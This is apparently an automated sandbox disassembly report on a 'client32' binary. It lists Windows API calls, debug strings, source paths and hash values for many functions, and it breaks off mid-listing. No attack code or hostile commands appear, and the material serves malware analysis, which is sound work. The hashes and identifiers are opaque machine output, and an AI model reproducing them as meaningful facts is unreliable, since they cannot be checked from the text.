                                                                                        • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 863766397-389219706
                                                                                        • Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                        • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                        • Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                        • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                        APIs
                                                                                        • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                        • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                        • API String ID: 2735369351-763374134
                                                                                        • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                        • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                        • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                        • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                        APIs
                                                                                        • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                        • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                        • EndPaint.USER32(?,?), ref: 1100572F
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                        • m_hWnd, xrefs: 110056C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1216912278-2830328467
                                                                                        • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                        • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                        • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                        • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 110B94C7
                                                                                        • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                          • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                                        • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                                        • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                                        • SetCursorPos.USER32(110C032C,110C032C), ref: 110B9524
                                                                                        • LoadCursorA.USER32(00000000,00007F00,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9531
                                                                                        • SetCursor.USER32(00000000), ref: 110B9538
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3235510773-0
                                                                                        • Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                        • Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
                                                                                        • Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                        • Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
                                                                                        APIs
                                                                                        • InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
                                                                                        • UI.CPP, xrefs: 111399BD
                                                                                        • De-Initing VolumeControl Subsystem..., xrefs: 11139994
                                                                                        • De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
                                                                                        • De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                                        • String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
                                                                                        • API String ID: 1808733558-973815363
                                                                                        • Opcode ID: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                                        • Instruction ID: d06095d957dcd957f3f08007483117ab829c543eb00cd4bea9fc0d92cb8d829e
                                                                                        • Opcode Fuzzy Hash: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                                        • Instruction Fuzzy Hash: 74014979E0955EF7CA00ABF59D41F8AF769DB4163DF100A26E829D2A80FB3561004795
                                                                                        APIs
                                                                                        • InterlockedDecrement.KERNEL32(?,?,00000000,756F110C,?,1100BF9B,?,00000000,00000002), ref: 1100B350
                                                                                        • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                        • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                          • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                          • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                          • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                          • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                          • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                        • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B3B8
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                        • _free.LIBCMT ref: 1100B3C8
                                                                                        • _free.LIBCMT ref: 1100B3CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                        • String ID:
                                                                                        • API String ID: 705253285-0
                                                                                        • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                        • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                        • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                        • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                        • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                        • API String ID: 2776021309-3012761530
                                                                                        • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                        • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                        • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                        • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 1101D66E
                                                                                        • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                        • RegisterClassExA.USER32 ref: 1101D6F1
                                                                                        • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 430917334-4108050209
                                                                                        • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                        • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                        • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                        • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                        APIs
                                                                                        • LoadMenuA.USER32 ref: 1100339D
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                        • DestroyMenu.USER32 ref: 110033F2
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                        • API String ID: 468487828-934300333
                                                                                        • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                        • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                        • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                        • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                        APIs
                                                                                        • LoadMenuA.USER32 ref: 1100348D
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                        • DestroyMenu.USER32 ref: 110034E2
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                        • API String ID: 468487828-934300333
                                                                                        • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                        • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                        • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                        • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                        APIs
                                                                                        • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                        • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                        • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11027614
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
